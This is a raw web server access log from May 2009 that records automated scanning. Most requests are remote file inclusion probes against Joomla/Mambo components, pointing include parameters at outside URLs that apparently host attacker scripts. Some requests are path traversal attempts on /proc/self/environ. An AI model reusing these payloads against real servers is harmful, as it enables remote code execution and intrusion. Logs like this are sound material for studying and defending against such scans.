195.34.78.110 - - [23/May/2009:02:26:34 -0400] "GET /logs/access_log.Q109050300//export.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:02:26:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [23/May/2009:02:26:53 -0400] "GET /logs/error_log.Q108102500/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
72.30.142.171 - - [23/May/2009:02:27:33 -0400] "GET /logs/error_log.Q107110900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.171 - - [23/May/2009:02:27:50 -0400] "GET /scripts/dqm_loader.js HTTP/1.0" 200 3374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.246.20.221 - - [23/May/2009:02:27:56 -0400] "GET /logs/error_log.Q108091500/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
66.223.51.15 - - [23/May/2009:02:28:13 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://minorblunders.com/orca.do?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
69.65.10.238 - - [23/May/2009:02:28:16 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tanoto-foundation.or.id/data/tanota/README? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.65.10.238 - - [23/May/2009:02:28:16 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tanoto-foundation.or.id/data/tanota/README? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.246.20.221 - - [23/May/2009:02:28:29 -0400] "GET /logs/error_log.Q108090200/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
69.65.10.238 - - [23/May/2009:02:28:30 -0400] "GET /logs/access_log.Q109031500%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tanoto-foundation.or.id/data/tanota/README? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:28:47 -0400] "GET /logs/access_log.Q109050300//virtuemart_parser.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
91.121.137.51 - - [23/May/2009:02:28:59 -0400] "GET /logs/access_log.Q108091400/errors.php?error=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:28:59 -0400] "GET /errors.php?error=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:28:59 -0400] "GET /logs/errors.php?error=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.232.54.48 - - [23/May/2009:02:29:12 -0400] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://jamur.do.am/osiris.txt??????? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
201.232.54.48 - - [23/May/2009:02:29:12 -0400] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://jamur.do.am/osiris.txt??????? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
201.232.54.48 - - [23/May/2009:02:29:12 -0400] "GET /logs/access_log.Q108052400/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://jamur.do.am/osiris.txt??????? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
218.246.20.221 - - [23/May/2009:02:29:15 -0400] "GET /logs/error_log.Q109012200/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
220.245.81.22 - - [23/May/2009:02:29:17 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.graal-plus.zp.ua//images/r.jpg?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
201.232.54.48 - - [23/May/2009:02:29:21 -0400] "GET /logs/access_log.Q108051700/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://jamur.do.am/osiris.txt??????? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:29:21 -0400] "GET /logs/access_log.Q108091400/errors.php?error=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:29:22 -0400] "GET /errors.php?error=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:29:22 -0400] "GET /logs/errors.php?error=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
218.246.20.221 - - [23/May/2009:02:29:23 -0400] "GET /logs/access_log.Q108091700/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
218.246.20.221 - - [23/May/2009:02:29:33 -0400] "GET /logs/error_log.Q108103100/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
69.65.10.238 - - [23/May/2009:02:29:35 -0400] "GET /logs/access_log.Q109031500/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tanoto-foundation.or.id/data/tanota/README? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
218.246.20.221 - - [23/May/2009:02:29:36 -0400] "GET /logs/error_log.Q108091600/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
218.246.20.221 - - [23/May/2009:02:29:38 -0400] "GET /logs/error_log.Q108112600/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
66.223.51.15 - - [23/May/2009:02:29:47 -0400] "GET /logs/access_log.Q108062400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://minorblunders.com/orca.do?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
66.223.51.15 - - [23/May/2009:02:29:47 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://minorblunders.com/orca.do?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
66.223.51.15 - - [23/May/2009:02:29:47 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://minorblunders.com/orca.do?? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
66.223.51.15 - - [23/May/2009:02:29:50 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.223.51.15 - - [23/May/2009:02:29:50 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.223.51.15 - - [23/May/2009:02:29:50 -0400] "GET /logs/access_log.Q108062400%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:02:30:04 -0400] "GET /logs/access_log.Q109050700//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.246.20.221 - - [23/May/2009:02:30:10 -0400] "GET /logs/error_log.Q108091700/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
218.246.20.221 - - [23/May/2009:02:30:11 -0400] "GET /logs/error_log.Q108122100/index.php?option=com_custompages&cpage=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
66.223.51.15 - - [23/May/2009:02:30:13 -0400] "GET /logs/access_log.Q108051700%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
59.120.3.108 - - [23/May/2009:02:30:16 -0400] "GET /logs/error_log.Q109051400/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
91.121.137.51 - - [23/May/2009:02:30:36 -0400] "GET /logs/access_log.Q108091400/?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:30:36 -0400] "GET /?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:30:36 -0400] "GET /logs/?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 200 2490 "-" "libwww-perl/5.805"
82.151.132.176 - - [23/May/2009:02:31:09 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
82.151.132.176 - - [23/May/2009:02:31:09 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.151.132.176 - - [23/May/2009:02:31:09 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:02:31:10 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081C94317B1E7004A6D043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.223.51.15 - - [23/May/2009:02:31:13 -0400] "GET /logs/access_log.Q108051700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://minorblunders.com/orca.do?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
59.120.3.108 - - [23/May/2009:02:31:22 -0400] "GET /logs/error_log.Q108102500/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
91.121.137.51 - - [23/May/2009:02:31:28 -0400] "GET /logs/access_log.Q109051200/?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:31:30 -0400] "GET /?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:31:30 -0400] "GET /logs/?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 200 2490 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:31:46 -0400] "GET /logs/access_log.Q108091400/?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
209.59.12.99 - - [23/May/2009:02:31:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.137.51 - - [23/May/2009:02:31:47 -0400] "GET /?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:31:47 -0400] "GET /logs/?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 200 2490 "-" "libwww-perl/5.805"
195.34.78.110 - - [23/May/2009:02:31:49 -0400] "GET /logs/access_log.Q109050300//export.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.137.51 - - [23/May/2009:02:31:49 -0400] "GET /logs/access_log.Q109051200/?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:31:50 -0400] "GET /?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:31:50 -0400] "GET /logs/?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 200 2490 "-" "libwww-perl/5.805"
72.30.142.171 - - [23/May/2009:02:32:08 -0400] "GET /logs/access_log.Q107092500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
140.128.99.10 - - [23/May/2009:02:32:35 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
140.128.99.10 - - [23/May/2009:02:32:35 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.76"
140.128.99.10 - - [23/May/2009:02:32:35 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 267 "-" "libwww-perl/5.76"
195.34.78.110 - - [23/May/2009:02:32:39 -0400] "GET /logs/access_log.Q109050300/?option=com_content&do_pdf=1&id=30//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:02:32:43 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se//templates/beez/css/test.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
77.222.40.40 - - [23/May/2009:02:32:43 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se//templates/beez/css/test.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
140.128.99.10 - - [23/May/2009:02:32:44 -0400] "GET /logs/access_log.Q109021500//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 267 "-" "libwww-perl/5.76"
195.34.78.110 - - [23/May/2009:02:32:50 -0400] "GET /logs/access_log.Q109050300//export.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:02:33:27 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:02:33:27 -0400] "GET /logs/access_log.Q108062400%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:02:33:27 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:02:33:45 -0400] "GET /logs/access_log.Q108051700%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
64.34.181.87 - - [23/May/2009:02:33:59 -0400] "GET /logs/access_log.Q108061500/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:02:33:59 -0400] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:02:33:59 -0400] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:02:34:01 -0400] "GET /logs/access_log.Q108111700/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:02:34:01 -0400] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:02:34:02 -0400] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
91.121.137.51 - - [23/May/2009:02:34:04 -0400] "GET /logs/access_log.Q108111700/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:34:04 -0400] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:34:05 -0400] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:34:11 -0400] "GET /logs/access_log.Q109051000/?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
91.198.47.201 - - [23/May/2009:02:34:12 -0400] "GET /logs/access_log.Q109050900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.826"
91.149.157.130 - - [23/May/2009:02:34:21 -0400] "GET /logs/access_log.Q108061500/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:34:21 -0400] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:02:34:22 -0400] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:34:22 -0400] "GET /logs/access_log.Q108111700/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:34:22 -0400] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
91.121.137.51 - - [23/May/2009:02:34:22 -0400] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
82.151.132.176 - - [23/May/2009:02:34:32 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
59.120.3.108 - - [23/May/2009:02:34:34 -0400] "GET /logs/access_log.Q108111500/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
59.120.3.108 - - [23/May/2009:02:34:34 -0400] "GET /index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
59.120.3.108 - - [23/May/2009:02:34:35 -0400] "GET /logs/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
211.241.40.51 - - [23/May/2009:02:34:38 -0400] "GET /logs/access_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://208.98.22.241/id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
211.241.40.51 - - [23/May/2009:02:34:38 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://208.98.22.241/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
211.241.40.51 - - [23/May/2009:02:34:39 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://208.98.22.241/id.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
59.120.3.108 - - [23/May/2009:02:34:41 -0400] "GET /logs/access_log.Q108090100/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
211.241.40.51 - - [23/May/2009:02:34:48 -0400] "GET /logs/error_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://208.98.22.241/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
221.143.42.96 - - [23/May/2009:02:34:53 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/p2000.do?? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
62.149.163.198 - - [23/May/2009:02:35:07 -0400] "GET /logs/index.php?stranica=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
62.149.163.198 - - [23/May/2009:02:35:07 -0400] "GET /logs/error_log.Q109042900/index.php?stranica=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
62.149.163.198 - - [23/May/2009:02:35:07 -0400] "GET /index.php?stranica=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
62.149.163.198 - - [23/May/2009:02:35:07 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
62.149.163.198 - - [23/May/2009:02:35:07 -0400] "GET /logs/error_log.Q109042900/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
62.149.163.198 - - [23/May/2009:02:35:07 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
62.149.163.198 - - [23/May/2009:02:35:08 -0400] "GET /logs/index.php?stranica=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 212 "-" "XXXXXX"
62.149.163.198 - - [23/May/2009:02:35:08 -0400] "GET /logs/error_log.Q109042900/index.php?stranica=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 233 "-" "XXXXXX"
62.149.163.198 - - [23/May/2009:02:35:08 -0400] "GET /index.php?stranica=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 207 "-" "XXXXXX"
62.149.163.198 - - [23/May/2009:02:35:08 -0400] "GET /logs/index.php?stranica=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "XXXXXX"
62.149.163.198 - - [23/May/2009:02:35:08 -0400] "GET /logs/error_log.Q109042900/index.php?stranica=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "XXXXXX"
62.149.163.198 - - [23/May/2009:02:35:08 -0400] "GET /index.php?stranica=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "XXXXXX"
195.34.78.110 - - [23/May/2009:02:35:45 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_virtuemart/compat.joomla1.5.php?dirname[__FILE__]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.223.51.15 - - [23/May/2009:02:35:54 -0400] "GET /logs/access_log.Q108062400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
59.120.3.108 - - [23/May/2009:02:36:03 -0400] "GET /logs/error_log.Q108091500/index.php?option=com_custompages&cpage=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
91.121.137.51 - - [23/May/2009:02:36:05 -0400] "GET /logs/access_log.Q109051000/?path%5Bdocroot%5D=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
195.34.78.110 - - [23/May/2009:02:36:07 -0400] "GET /logs/access_log.Q109050300//virtuemart_parser.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
